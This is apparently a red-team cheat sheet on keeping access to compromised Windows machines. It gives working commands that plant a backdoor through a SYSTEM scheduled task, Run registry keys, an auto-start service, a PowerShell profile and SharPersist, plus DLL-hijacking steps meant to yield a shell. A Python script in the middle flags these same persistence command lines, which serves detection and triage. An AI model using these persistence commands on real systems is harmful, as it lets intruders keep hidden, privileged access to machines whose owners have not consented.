Here are some common methods for maintaining access. If you find any errors or need to update anything, please mail me!
Scheduled Task
We can create a scheduled task that executes a specified binary or command. For example, if we want to execute UpdateMessenger.exe
every two hours, we can use the methods below.
Native Windows Command
Upload your backdoor and run the following command:
schtasks /create /sc hourly /mo 2 /tn "UpdateMessenger" /tr C:\Windows\Tasks\UpdateMessenger.exe /ru "SYSTEM"
Using SharPersist
.\SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
Registry Persistence
By modifying a Run registry key, an attacker can have a specified binary started at logon.
Native Windows Command
For the currently compromised user:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Legit Service" /t REG_SZ /F /D "C:\Windows\Tasks\legit.exe"
If you have SYSTEM-level access:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Legit Service" /t REG_SZ /F /D "C:\Windows\Tasks\legit.exe"
Using SharPersist (-k selects the Run key, e.g. hkcurun for HKCU; -v is the value name):
.\SharPersist.exe -t reg -c "C:\Windows\Tasks\legit.exe" -k "hkcurun" -v "Legit Service" -m add
As a result, whenever the compromised system reboots and the user logs on again, the attacker gets reconnected.
Backdoor as a Service
If we create a service, we can have our backdoor executed as a service.
Native Windows Command
sc create evilsvc binpath= "C:\Windows\Tasks\legit.exe" start= "auto" obj= "LocalSystem"
Using SharPersist
.\SharPersist.exe -t service -c "C:\Windows\Tasks\legit.exe" -n "Legit Service" -m add
PowerShell Profile
Whenever the compromised user starts PowerShell, our backdoor is executed as well.
- Create a file called profile.ps1 in %USERPROFILE%\Documents\WindowsPowerShell
- Store the command to be executed in it (no quotes around the path, otherwise PowerShell treats it as a string and only prints it):
echo C:\Windows\Tasks\legit.exe > "%USERPROFILE%\Documents\WindowsPowerShell\profile.ps1"
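The four mechanisms above (scheduled task, Run key, service, PowerShell profile) all leave a recognisable process command line behind. As an added example that is not part of this page, the following Python script classifies constructed Sysmon Event ID 1 / Security 4688-style command lines against those patterns; the sample lines, the rule names and the severity logic are assumptions for illustration.

```python
import re

# Constructed process-creation command lines (what a Sysmon Event ID 1 or
# Security 4688 record carries), not real telemetry. The first four mirror the
# persistence commands on this page; the rest are benign look-alikes.
SAMPLE_CMDLINES = [
    r'schtasks /create /sc hourly /mo 2 /tn "UpdateMessenger" /tr C:\Windows\Tasks\UpdateMessenger.exe /ru "SYSTEM"',
    r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Legit Service" /t REG_SZ /F /D "C:\Windows\Tasks\legit.exe"',
    r'sc create evilsvc binpath= "C:\Windows\Tasks\legit.exe" start= "auto" obj= "LocalSystem"',
    r'cmd.exe /c echo C:\Windows\Tasks\legit.exe > "C:\Users\bob\Documents\WindowsPowerShell\profile.ps1"',
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v OneDrive /d "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe"',
    r'schtasks /query /tn "Backup"',
    r'sc query evilsvc',
]

# One pattern per technique described on this page (assumed rule names).
RULES = (
    ("scheduled_task", re.compile(r"\bschtasks(?:\.exe)?\b.*?\s/create\b", re.I)),
    ("run_key", re.compile(r"\breg(?:\.exe)?\s+add\b.*?\\CurrentVersion\\Run(?:Once)?\b", re.I)),
    ("service", re.compile(r"\bsc(?:\.exe)?\s+create\b", re.I)),
    ("ps_profile", re.compile(r">\s*\S*profile\.ps1\b", re.I)),
)

# Secondary signals that raise severity: a binary staged in C:\Windows\Tasks
# (the directory every example on this page uses) or SYSTEM-level execution.
STAGING_DIR = re.compile(r"\\Windows\\Tasks\\", re.I)
SYSTEM_CTX = re.compile(r'/ru\s+"?SYSTEM"?|obj=\s*"?LocalSystem"?', re.I)

def classify(cmdline):
    """Return (technique, severity) if cmdline matches a persistence rule, else None."""
    for technique, pattern in RULES:
        if pattern.search(cmdline):
            high = STAGING_DIR.search(cmdline) or SYSTEM_CTX.search(cmdline)
            return technique, "high" if high else "medium"
    return None

def scan(cmdlines):
    """Classify every command line; return hits as (technique, severity, cmdline)."""
    findings = []
    for line in cmdlines:
        hit = classify(line)
        if hit:
            findings.append((hit[0], hit[1], line))
    return findings

if __name__ == "__main__":
    for technique, severity, line in scan(SAMPLE_CMDLINES):
        print(f"[{severity}] {technique}: {line}")
```

Only the OneDrive Run value comes back as medium: it matches the technique but neither the staging directory nor a SYSTEM context, which is how a triage queue separates the page's examples from routine software installs.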
DLL Hijacking
When a new process starts, it searches a fixed set of locations, in order, for the libraries it needs.
DLL Search Order:
1. The application directory
2. C:\Windows\System32
3. C:\Windows\System
4. C:\Windows
5. Current working directory
6. Directories in the %PATH% environment variable
How to Hijack?
- To hijack a DLL, we first need to find a DLL that the application searches for but does not find. Use ProcMon, filtering on the application name and the "NOT FOUND" result.
- Then, using icacls C:\TargetApp, verify whether the directory is writable.
- If the directory is writable, build our malicious DLL, give it the same name as the legitimate DLL that was not found, and copy it into that directory.
- If everything is done correctly, we get a shell when the vulnerable application is re-executed.
Note: WinPEAS can check whether DLL hijacking is possible.
Other interesting methods will be noted and added here.